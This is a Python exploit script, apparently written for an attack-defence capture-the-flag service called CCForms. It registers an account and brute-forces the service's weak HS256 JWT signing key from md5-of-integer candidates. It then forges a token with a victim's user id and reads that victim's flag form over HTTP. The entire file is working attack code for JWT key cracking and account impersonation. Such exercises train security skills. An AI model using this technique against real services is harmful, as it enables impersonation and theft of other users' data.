#!/usr/bin/env python3
import base64
import hashlib
import hmac
import json
import re
import sys

import jwt
import requests

from utils import *
PORT: int = 3001  # TCP port of the target service; used for ClientSession and the raw /form request in exploit()
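def _b64url_decode(segment):
    """Decode one base64url JWT segment, restoring the padding JWTs strip."""
    return base64.urlsafe_b64decode(segment + '=' * (-len(segment) % 4))


def _recover_hs256_secret(token, limit=32768):
    """Brute-force the HS256 key of ``token`` over the known secret space.

    Candidate keys are ``md5(str(i) + '\\n').hexdigest() + ' -'`` for ``i``
    in ``range(limit)``.  NOTE(review): this looks like the output of piping
    a small integer through ``md5sum`` (32768 is the default ``pid_max``,
    so plausibly a PID) — confirm against the service source before
    widening or narrowing ``limit``.

    The signature is recomputed with ``hmac`` directly rather than calling
    ``jwt.decode`` once per candidate: that saves a full header/claim parse
    and a raised-and-caught exception for every miss (tens of thousands of
    them per run), and it keeps key recovery independent of claim
    validation — an expired ``exp`` claim would otherwise abort the search
    with ``ExpiredSignatureError`` before the key was found.

    Args:
        token: compact-serialised JWT (``header.payload.signature``).
        limit: number of candidate integers to try (exclusive upper bound).

    Returns:
        The matching key as ``str``, or ``None`` if no candidate verifies.

    Raises:
        Exception: if the token is malformed or its header does not select
            HS256 (mirrors ``jwt.decode(..., algorithms=['HS256'])``, which
            also refuses ``alg: none`` and any other algorithm).
    """
    parts = token.split('.')
    if len(parts) != 3:
        raise Exception(f"Malformed JWT: {token!r}")
    header_b64, payload_b64, sig_b64 = parts

    header = json.loads(_b64url_decode(header_b64))
    if header.get('alg') != 'HS256':
        raise Exception(f"Unexpected JWT alg {header.get('alg')!r}, expected HS256")

    # HS256 signs the raw (still base64url) first two segments joined by '.'.
    signing_input = f'{header_b64}.{payload_b64}'.encode()
    signature = _b64url_decode(sig_b64)

    for i in range(limit):
        candidate = hashlib.md5((str(i) + '\n').encode()).hexdigest() + ' -'
        mac = hmac.new(candidate.encode(), signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(mac, signature):
            return candidate
    return None


def exploit(ip, flag_id, *, timeout=10.0):
    """Read the victim's flag form by forging their JWT.

    1. Register a fresh account and take its session JWT.
    2. Recover the server's HS256 signing key by brute force
       (``_recover_hs256_secret``).
    3. Sign a new token whose ``id`` claim is the victim's ``user_id``.
    4. GET ``/form/<form_id>`` with it and extract the flag from the body.

    Args:
        ip: address of the target host; the service port is ``PORT``.
        flag_id: dict with ``user_id`` (victim) and ``form_id`` (flag form).
        timeout: per-request timeout in seconds for the flag fetch, so a
            stalled service cannot hang the caller indefinitely (the
            original had none).

    Returns:
        The flag string, matched as ``[A-Z0-9]{31}=``.

    Raises:
        Exception: if the key is not found, the flag request is rejected,
            or the response body contains no flag.
    """
    client = ClientSession(ip, PORT)
    client.register()
    token = client.export_credentials()['token']
    print(f"JWT: {token}")

    print('Bruteforcing secret...')
    secret = _recover_hs256_secret(token)
    if secret is None:
        raise Exception("Failed to find secret")
    print("Found secret")
    print(f"Secret: {secret}")

    forged = jwt.encode({'id': flag_id['user_id'], 'username': 'x'}, secret, algorithm='HS256')
    # PyJWT < 2 returns bytes; f-string formatting would then send "Bearer b'...'".
    if isinstance(forged, bytes):
        forged = forged.decode('ascii')

    r = requests.get(
        f'http://{ip}:{PORT}/form/{flag_id["form_id"]}',
        headers={'Authorization': f'Bearer {forged}'},
        timeout=timeout,
    )
    if r.status_code != 200:
        raise Exception(f"Failed to get flag: {r.text}")

    m = re.search(r'[A-Z0-9]{31}=', r.text)
    if m is None:
        raise Exception("Failed to find flag in " + r.text)
    return m.group(0)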
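if __name__ == "__main__":
    # Usage: CCForms-1-jwtsecret.py <ip> '<flag_id JSON>'
    # flag_id is a JSON object providing "user_id" and "form_id" (the keys
    # exploit() reads); presumably handed out by the checker harness.
    # Fail with a usage line instead of an IndexError when arguments are missing.
    if len(sys.argv) != 3:
        print(f"usage: {sys.argv[0]} <ip> <flag_id-json>", file=sys.stderr)
        sys.exit(2)
    ip = sys.argv[1]
    flag_id = json.loads(sys.argv[2])
    # The flag is the last line on stdout.
    print(exploit(ip, flag_id))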